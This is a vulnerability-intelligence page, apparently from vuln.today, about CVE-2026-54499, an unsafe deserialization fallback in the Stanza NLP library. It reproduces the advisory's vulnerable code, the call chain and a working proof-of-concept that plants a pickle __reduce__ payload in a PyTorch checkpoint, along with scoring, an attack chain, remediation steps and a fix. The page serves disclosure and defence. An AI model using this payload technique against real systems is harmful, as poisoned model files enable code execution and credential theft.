What is the CVSS score of CVE-2026-54499?

CVE-2026-54499 has a CVSS 3.1 base score of 7.5 (High). CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H.

Which versions of Stanza are affected by CVE-2026-54499?

Stanford NLP's Stanza library (versions ≤1.12.1) contains an arbitrary code execution vulnerability triggered when downloading PyTorch model checkpoints from public repositories (HuggingFace,…. A patch is available.

How to fix or mitigate CVE-2026-54499?

Within 24 hours: Identify all systems running Stanza ≤1.12.1; immediately upgrade to Stanza 1.12.2 and invalidate cached model files. Within 7 days: Audit execution logs for unauthorized activity during the vulnerable period; re-download and validate all model files from trusted sources. Within 30 days: Implement software composition analysis (SCA) in CI/CD to detect vulnerable library versions and establish secure model sourcing procedures.

Stanza CVE-2026-54499

HIGH

Deserialization of Untrusted Data (CWE-502)

2026-06-19 https://github.com/stanfordnlp/stanza

GHSA-v5jw-96jm-7h2c

Checkpoint Deserialization Python RCE

7.5

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

7.5 HIGH

AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

vuln.today AI

8.8 HIGH

Network delivery via model repos (AV:N); trigger is a one-line pickle global, not complex (AC:L); no auth needed (PR:N); victim must load the file (UI:R); full RCE yields C/I/A:H.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

High

Privileges Required

None

User Interaction

Required

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

Jun 19, 2026 - 21:24 vuln.today

Analysis Generated

Jun 19, 2026 - 21:24 vuln.today

CVE Published

Jun 19, 2026 - 19:35 github-advisory

HIGH 7.5

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

95 pypi packages depend on stanza (87 direct, 9 indirect)

Ecosystem-wide dependent count for version 1.12.2.

DescriptionGitHub Advisory

Summary

Stanza 1.12.0 attempts to safely load PyTorch checkpoint files using torch.load(..., weights_only=True), but automatically falls back to the fully unsafe torch.load(..., weights_only=False) when the safe load raises pickle.UnpicklingError. Because the UnpicklingError condition is fully attacker-controllable, any .pt file that contains a single unsupported pickle global will trigger it.

An attacker who can place a malicious pretrain or model file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) can achieve arbitrary code execution on any machine that loads a Stanza NLP pipeline.

Code execution occurs inside the Stanza pretrain-loading API, not merely by calling torch.load directly.

Details

The vulnerable code is in pretrain.py#L59-L67 (Stanza 1.12.0):

python

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=False)

When weights_only=True is passed, PyTorch's deserializer raises pickle.UnpicklingError for any object whose class or callable is not on the safe-globals allowlist. This is the intended safety mechanism. However, Stanza catches that exception and immediately reloads the same attacker-controlled file with weights_only=False, which invokes Python's full pickle deserializer and executes any __reduce__ method in the file without restriction.

The fallback is triggered reliably and intentionally: an attacker embeds one unsupported pickle global (e.g., builtins.open) anywhere in an otherwise structurally valid Stanza pretrain state dict. The safe load rejects it; the unsafe reload runs it.

The same try/except pattern exists in at least five additional loaders in Stanza 1.12.0:

File	Lines
`stanza/models/common/pretrain.py`	64-66
`stanza/models/coref/model.py`	251-253, 329-331
`stanza/models/classifiers/trainer.py`	80-82
`stanza/models/constituency/base_trainer.py`	94-96

Additionally, stanza/models/lemma_classifier/base_model.py:127 calls torch.load(filename, lambda storage, loc: storage) with no weights_only argument at all, which defaults to False on any PyTorch < 2.6.

The call chain from the public API to the vulnerable fallback is:

stanza.models.common.foundation_cache.load_pretrain(path)
  → FoundationCache.load_pretrain(path)
    → stanza.models.common.pretrain.Pretrain(filename)
      → Pretrain.emb  (property access triggers load)
        → Pretrain.load()
          → torch.load(..., weights_only=True)
# raises UnpicklingError
          → torch.load(..., weights_only=False)
# executes arbitrary pickle

---

PoC

Environment: Python 3.11, stanza1.12.0, torch2.12.0

Step 1: Install dependencies:

bash

pip install stanza==1.12.0 torch==2.12.0

Step 2: Save the following as exploit.py:

python

import os
from pathlib import Path

import torch
import stanza
from stanza.models.common.foundation_cache import FoundationCache, load_pretrain
from stanza.models.common.vocab import VOCAB_PREFIX

SENTINEL = "/tmp/stanza_rce_proof"
MODEL    = "/tmp/stanza_malicious.pt"

class HarmlessPayload:
    """Demonstrates execution; writes a sentinel file."""
    def __init__(self, path):
        self.path = path
    def __reduce__(self):
        return (open, (self.path, "w"))
# Build a structurally valid Stanza pretrain state dict with the payload embedded.
words = VOCAB_PREFIX + ["hello"]
state = {
    "vocab": {
        "lang": "", "idx": 0, "cutoff": 0, "lower": False,
        "_id2unit": words,
        "_unit2id": {w: i for i, w in enumerate(words)},
    },
    "emb": torch.zeros((len(words), 2), dtype=torch.float32),
    "payload": HarmlessPayload(SENTINEL),
# ← the malicious object
}
torch.save(state, MODEL)
# Confirm safe-only load raises UnpicklingError and does NOT create sentinel.
try:
    torch.load(MODEL, lambda s, l: s, weights_only=True)
    print("UNEXPECTED: safe load succeeded (no fallback needed)")
except Exception as e:
    print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")
# Load through the real Stanza API. The fallback fires and the sentinel is created.
cache   = FoundationCache()
pretrain = load_pretrain(MODEL, foundation_cache=cache)

print(f"stanza={stanza.__version__}  torch={torch.__version__}")
print(f"emb_shape={tuple(pretrain.emb.shape)}")
print(f"sentinel_exists={Path(SENTINEL).exists()}")
print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN")

Step 3 : Run:

bash

python exploit.py

Expected output (confirmed):

Control: safe load raised UnpicklingError : sentinel exists: False
stanza=1.12.0  torch=2.12.0
emb_shape=(5, 2)
sentinel_exists=True
VERDICT: ACTUAL_VULN_REAL_STANZA_PATH

The sentinel is created exclusively by the Stanza pretrain-loading API invoking the unsafe fallback : not by a direct torch.load call in the PoC.

---

Impact

Vulnerability class: CWE-502 : Deserialization of Untrusted Data

Who is impacted: Any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model pretrain file from a source that is not under the victim's exclusive cryptographic control. Concretely:

Developers who run stanza.Pipeline(lang) after downloading models from HuggingFace or GitHub
CI pipelines that automatically refresh Stanza models during builds
Research environments that share pretrain files over shared network storage or model repositories

Attack prerequisites: The attacker must be able to place a malicious .pt pretrain file at a path that Stanza will load. Realistic delivery vectors include:

Compromise of a HuggingFace model repository hosting Stanza pretrain weights
Poisoning of a shared model cache directory (NFS, S3, artifact store)
A malicious pretrain file distributed via a third-party fine-tuning hub or research repo

What an attacker achieves: Arbitrary code execution with the full privileges of the process running stanza.Pipeline(), typically a developer workstation, a Jupyter notebook server, or a GPU training node. This allows credential theft (HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure.

Recommended fix:

Remove the unsafe fallback entirely. If weights_only=True raises UnpicklingError, fail closed:

python

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError as e:
    raise RuntimeError(
        f"Refusing to load legacy pretrain file {self.filename!r} with unsafe "
        "deserialization. Regenerate the file using a trusted Stanza migration tool."
    ) from e

If legacy NumPy-containing pretrain files must be supported, use PyTorch's add_safe_globals() API to allowlist the specific NumPy dtypes required, rather than disabling all safety checks. Apply the same fix to all six affected loaders listed above.

AnalysisAI

Arbitrary code execution in Stanford NLP's Stanza 1.12.0 (and ≤1.12.1) occurs when the library loads a malicious PyTorch checkpoint, because its pretrain loader silently falls back from torch.load(weights_only=True) to weights_only=False whenever an UnpicklingError is raised - a condition the attacker fully controls by embedding one unsupported pickle global. Publicly available exploit code exists (working PoC in the GHSA advisory), and any developer, CI pipeline, or production NLP service that downloads Stanza model files from HuggingFace, GitHub, or a shared cache can be compromised. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Compromise model repository or shared cache

Delivery

Publish malicious .pt with embedded pickle global

Exploit

Victim runs stanza.Pipeline()

Install

weights_only=True raises UnpicklingError

Fallback loads file with weights_only=False

Execute

__reduce__ executes arbitrary Python

Impact

Credential theft and lateral movement

Recon

Compromise model repository or shared cache

Delivery

Publish malicious .pt with embedded pickle global

Exploit

Victim runs stanza.Pipeline()

Install

weights_only=True raises UnpicklingError

Fallback loads file with weights_only=False

Execute

__reduce__ executes arbitrary Python

Impact

Credential theft and lateral movement

Vulnerability AssessmentAI

Exploitation	Attacker must place a malicious `.pt` checkpoint file at a filesystem path that Stanza will load via `stanza.Pipeline()`, `FoundationCache.load_pretrain()`, or any of the six affected loaders (`pretrain.py`, `coref/model.py`, `classifiers/trainer.py`, `constituency/base_trainer.py`, `lemma_classifier/base_model.py`). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The provided CVSS 3.1 vector AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H scores 7.5 (High); however, AC:H and UI:R are arguably understated - the PoC demonstrates that the fallback is reliably and trivially triggered by embedding a single unsupported global, and 'user interaction' here is the routine act of loading a model file most data-science workflows perform automatically. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker publishes a poisoned Stanza pretrain `.pt` file to a HuggingFace mirror, a typosquatted GitHub release, or writes it into a shared NFS/S3 model cache used by a research team. When a developer runs `stanza.Pipeline('en')` or any code path that calls `load_pretrain()`, the safe load raises `UnpicklingError` on the attacker-embedded global, the unsafe fallback fires, and the attacker's `__reduce__` payload executes arbitrary Python in the developer's session - exfiltrating HuggingFace tokens, AWS/GCP keys from environment, or installing persistence. …
Remediation	Vendor-released patch: upgrade `stanza` to 1.12.2 or later via `pip install --upgrade stanza` (per GHSA-v5jw-96jm-7h2c). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all systems running Stanza ≤1.12.1; immediately upgrade to Stanza 1.12.2 and invalidate cached model files. …

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-47747 HIGH This Week

7.8 Jun 16

Heap-based buffer overflow in stable-diffusion.cpp's pickle .ckpt parser allows attackers to corrupt memory and likely a

CVE-2026-47750 HIGH This Week

7.8 Jun 16

Heap buffer overflow in the leejet stable-diffusion.cpp pickle .ckpt parser allows arbitrary code execution when a user

CVE-2026-47749 HIGH This Week

7.8 Jun 16

Heap buffer overflow in stable-diffusion.cpp versions prior to master-584-0a7ae07 allows attackers to corrupt memory and

CVE-2026-48775 MEDIUM This Month

6.8 Jun 16

Unsafe deserialization in LangGraph SQLite Checkpoint's JsonPlusSerializer (versions 4.1.0 and prior) allows arbitrary P

CVE-2026-47748 MEDIUM This Month

5.5 Jun 16

Out-of-bounds reads in stable-diffusion.cpp's PyTorch pickle checkpoint parser (versions prior to master-584-0a7ae07) al

CVE-2026-54499 vulnerability details – vuln.today

Back

Stanza CVE-2026-54499

Severity by source

CVSS VectorGitHub Advisory

Lifecycle Timeline

Blast Radius

DescriptionGitHub Advisory

Summary

Details

PoC

Impact

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

More from same product – last 7 days

Share

External POC / Exploit Code